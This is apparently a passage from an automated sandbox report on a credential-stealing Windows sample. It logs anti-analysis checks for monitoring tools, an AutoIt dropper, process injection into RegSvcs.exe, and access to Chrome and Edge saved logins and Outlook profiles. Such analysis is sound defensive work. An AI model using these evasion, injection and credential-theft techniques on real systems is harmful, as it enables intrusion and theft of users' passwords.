                  Source: ref_97024130865.exe, 00000000.00000002.2063732529.0000000001620000.00000004.00000020.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000002.2081249049.0000000001838000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                  Source: nonplacental.exe, 00000005.00000002.2197381352.00000000018D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEXE
                  Source: nonplacental.exe, 00000005.00000002.2197802542.00000000019AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXELQ2
                  Source: nonplacental.exe, 00000002.00000003.2063594339.00000000017A5000.00000004.00000020.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2065322693.00000000017A5000.00000004.00000020.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2066484581.00000000017A5000.00000004.00000020.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2062779197.00000000017A5000.00000004.00000020.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2064611358.00000000017A5000.00000004.00000020.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2080603298.00000000017A5000.00000004.00000020.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2064118227.00000000017A5000.00000004.00000020.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2062714879.0000000001781000.00000004.00000020.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000002.2081180409.00000000017A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXENC
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Users\user\Desktop\ref_97024130865.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-105579
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                  Source: C:\Users\user\Desktop\ref_97024130865.exeAPI coverage: 4.6 %
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeAPI coverage: 4.8 %
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 5.3 %
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0103445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0103445A
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0103C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0103C75C
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0103C6D1 FindFirstFileW,FindClose,0_2_0103C6D1
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0103EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0103EF95
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0103F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0103F0F2
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0103F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0103F3F3
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_010337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_010337EF
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_01033B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_01033B12
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0103BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0103BCBC
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0065445A GetFileAttributesW,FindFirstFileW,FindClose,2_2_0065445A
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0065C6D1 FindFirstFileW,FindClose,2_2_0065C6D1
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0065C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0065C75C
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0065EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0065EF95
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0065F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0065F0F2
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0065F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0065F3F3
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_006537EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_006537EF
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_00653B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00653B12
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0065BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0065BCBC
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FD49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00FD49A0
                  Source: RegSvcs.exe, 00000003.00000002.3295602592.0000000001005000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3295099646.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\ref_97024130865.exeAPI call chain: ExitProcess graph end nodegraph_0-104216
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_01043F09 BlockInput,0_2_01043F09
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FD3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00FD3B3A
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_01005A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_01005A7C
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FD4B37 LoadLibraryA,GetProcAddress,0_2_00FD4B37
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_01583028 mov eax, dword ptr fs:[00000030h]0_2_01583028
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_01584668 mov eax, dword ptr fs:[00000030h]0_2_01584668
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_015846C8 mov eax, dword ptr fs:[00000030h]0_2_015846C8
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_01794170 mov eax, dword ptr fs:[00000030h]2_2_01794170
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_017941D0 mov eax, dword ptr fs:[00000030h]2_2_017941D0
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_01792B30 mov eax, dword ptr fs:[00000030h]2_2_01792B30
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 5_2_01946B88 mov eax, dword ptr fs:[00000030h]5_2_01946B88
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 5_2_01948228 mov eax, dword ptr fs:[00000030h]5_2_01948228
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 5_2_019481C8 mov eax, dword ptr fs:[00000030h]5_2_019481C8
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0102810A GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_0102810A
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FFA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FFA155
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FFA124 SetUnhandledExceptionFilter,0_2_00FFA124
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0061A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0061A155
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0061A124 SetUnhandledExceptionFilter,2_2_0061A124
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0040CE09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0040E61C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00416F6A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004123F1 SetUnhandledExceptionFilter,3_2_004123F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AE2008Jump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7E3008Jump to behavior
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_010287B1 LogonUserW,0_2_010287B1
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FD3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00FD3B3A
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FD48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00FD48D7
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_01034C27 mouse_event,0_2_01034C27
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\ref_97024130865.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\juvenile\nonplacental.exe "C:\Users\user\AppData\Local\juvenile\nonplacental.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\juvenile\nonplacental.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_01027CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_01027CAF
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0102874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0102874B
                  Source: ref_97024130865.exe, nonplacental.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: ref_97024130865.exe, nonplacental.exeBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FF862B cpuid 0_2_00FF862B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,3_2_00417A20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_01004E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_01004E87
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_01011E06 GetUserNameW,0_2_01011E06
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_01003F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_01003F3A
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FD49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00FD49A0
                  Source: C:\Users\user\Desktop\ref_97024130865.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: ref_97024130865.exe, 00000000.00000002.2063732529.0000000001620000.00000004.00000020.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000002.2081249049.0000000001838000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procmon.exe
                  Source: ref_97024130865.exe, 00000000.00000002.2063783067.000000000163D000.00000004.00000020.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000002.2197802542.00000000019AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcupdate.exe

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.53a0000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d86458.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d85570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b2097e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3dae190.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b2097e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970ee8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b21866.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d85570.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6660, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3128, type: MEMORYSTR
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.53a0000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d86458.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d85570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b2097e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3dae190.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b2097e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970ee8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b21866.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d85570.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.53a0000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d86458.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d85570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b2097e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3dae190.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b2097e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970ee8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.2b21866.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.3d85570.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6660, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3128, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: nonplacental.exeBinary or memory string: WIN_81
                  Source: nonplacental.exeBinary or memory string: WIN_XP
                  Source: nonplacental.exeBinary or memory string: WIN_XPe
                  Source: nonplacental.exeBinary or memory string: WIN_VISTA
                  Source: nonplacental.exeBinary or memory string: WIN_7
                  Source: nonplacental.exeBinary or memory string: WIN_8
                  Source: nonplacental.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.2970000.2.raw.unpack, type: UNPACKEDPE
